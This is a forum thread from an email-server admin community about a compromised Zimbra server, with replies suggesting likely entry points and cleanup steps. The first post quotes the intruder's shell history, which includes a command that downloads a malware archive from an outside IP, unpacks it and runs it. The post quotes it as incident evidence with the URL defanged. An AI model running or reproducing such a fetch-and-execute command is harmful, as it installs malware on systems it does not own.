Zimbra offers Open Source email server software and shared calendar for Linux and the Mac
Go Back   Zimbra :: Forums > Zimbra Collaboration Suite > Administrators

Welcome to the Zimbra :: Forums!
Welcome, if you would like to post a comment please register. We also encourage you to explore all things Zimbra with our team and members of the community.

Reply
 
LinkBack Thread Tools Search this Thread Display Modes
  #1 (permalink)  
Old 07-22-2010, 03:29 AM
sem sem is offline
Active Member
 
Posts: 29
Default Zimbra Server compromised

Hi - a zimbra box I keep an eye on was compromised on 12/7 - I noticed I stopped receiving automated emails from the backup script.

This was in the .bash_history

id
uname -a
ls -a
cat .bash_history
cd /tmp
ls -a
wget eff-tee-pee://user:123456@65.38.182.79/autorun.tgz;tar[/url] -xzvf autorun.tgz;rm -rf autorun.tgz;cd .m;cd conect3;chmod +x *;./start lfg
cd ..
ls -a
cd ..
rm -rf .m
ps x
kill -9 12150
exit

So the zmback cron was removed. It's an ubuntu 8.04 server, kept up to date with apt. Apart from zimbra, the only other thing installed is Webmin which is locked down to being only available to 2 IP addresses. The router only has open ports for the essential zimbra services (secure imap, ssl smpt etc).

Any advice please? My desktop AVG reports the file as being infected with Linux/Mech.A -

I've altered the URL shown to as to stop people clicking on it.

sem
Reply With Quote
  #2 (permalink)  
Old 07-22-2010, 04:26 AM
Moderator
 
Posts: 927
Default

Can you rule out physical access?
Reply With Quote
  #3 (permalink)  
Old 07-22-2010, 05:10 AM
sem sem is offline
Active Member
 
Posts: 29
Default

Quote:
Originally Posted by Dirk View Post
Can you rule out physical access?
Not 100% to be honest. The server is in a server room that is normally locked. I'm the only one that knows the root password.

Up until this morning, other than the afforementioned zimbra ports and ssh, only webmin was available - I've since closed these ports off too.
Reply With Quote
  #4 (permalink)  
Old 07-22-2010, 05:24 AM
Partner (VAR/HSP)
 
Posts: 260
Default

odds on, you had a weak password on an account and it was a simple brute force ssh attack.
__________________
http://www.solutionsfirst.com.au/hosting/zimbra/
Australia's premier Zimbra Hosting Partner
Resellers wanted!
Reply With Quote
  #5 (permalink)  
Old 07-22-2010, 05:25 AM
Moderator
 
Posts: 927
Default

Are there any signs of bruteforcing the ssh password?
Working out how the attack was performed is hard unless you have experience of this in the past, I'd lean towards thinking that it's not Zimbra itself that's been breached though.

I'm not aware of any remote exploit or attack that can be performed against ports 25,443 and 993 open to Zimbra.
Reply With Quote
  #6 (permalink)  
Old 07-22-2010, 05:32 AM
sem sem is offline
Active Member
 
Posts: 29
Default

Quote:
Originally Posted by dave_kempe View Post
odds on, you had a weak password on an account and it was a simple brute force ssh attack.
Unlikely - I'm not an expert but port 22 on the router is port forwarded to another linux machine - you then open an ssh session to the zimbra box. I've checked this one and it's not been compromised at all. that's the only ssh route to the zimbra box.
Reply With Quote
  #7 (permalink)  
Old 07-22-2010, 05:34 AM
sem sem is offline
Active Member
 
Posts: 29
Default

Quote:
Originally Posted by Dirk View Post
Are there any signs of bruteforcing the ssh password?
Working out how the attack was performed is hard unless you have experience of this in the past, I'd lean towards thinking that it's not Zimbra itself that's been breached though.

I'm not aware of any remote exploit or attack that can be performed against ports 25,443 and 993 open to Zimbra.
Not on the zimbra server - outside of the network, you can't directly ssh to it.
Reply With Quote
  #8 (permalink)  
Old 07-22-2010, 06:42 AM
Moderator
 
Posts: 1,209
Default

Are you saying Webmin was exposed to the public Internet? That alone provides a pretty broad attack surface...

If you also had Webmin open on your Desktop and went to another web site with an infected ad, that could also be the attack vector. See Webmin for example.

If the root account on your Zimbra server has been compromised, just changing the root password is likely not sufficient for eliminating the exposure.

I'd strongly suggest engaging a professional security firm for an assessment.

Hope that helps,
Mark
__________________
___________________________________
L. Mark Stone, CIO


"Uptime. All the time."

477 Congress Street | Portland, ME 04101-3431 | (207) 772-5678

proactive maintenance and monitoring | technology consulting
Zimbra groupware | EMR implementations | private cloud hosting
Reply With Quote
  #9 (permalink)  
Old 07-22-2010, 07:16 AM
sem sem is offline
Active Member
 
Posts: 29
Default

Quote:
Originally Posted by LMStone View Post
Are you saying Webmin was exposed to the public Internet? That alone provides a pretty broad attack surface...

Hope that helps,
Mark
Hi - thanks for the advice. I've used webmin to varying extents for years - the version on the zimbra box is the latest. it's not really used and doesn't have 100% access from the Internet - it was also not operatiing on the standard webmin port.

i've disabled access to the root account and changed the password on the sole user account. I've checked again and the only thing compromised was the cron job - it looks like the virus was unable to propagate itself.

I'm getting someone to take a look at it tonight though.

Last edited by sem; 07-22-2010 at 07:45 AM..
Reply With Quote
  #10 (permalink)  
Old 07-22-2010, 11:53 AM
sem sem is offline
Active Member
 
Posts: 29
Default

As an update I've shut off all access from the internet beyond what zimbra requires to handle mail. vigilance ensues.
Reply With Quote
Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes


Similar Threads

Why Join?

Registering let's you ask questions, makes it easier to search, displays any files attached to posts, and notifies you about replies.

blog.zimbra.com




 

SEO by vBSEO ©2011, Crawlability, Inc.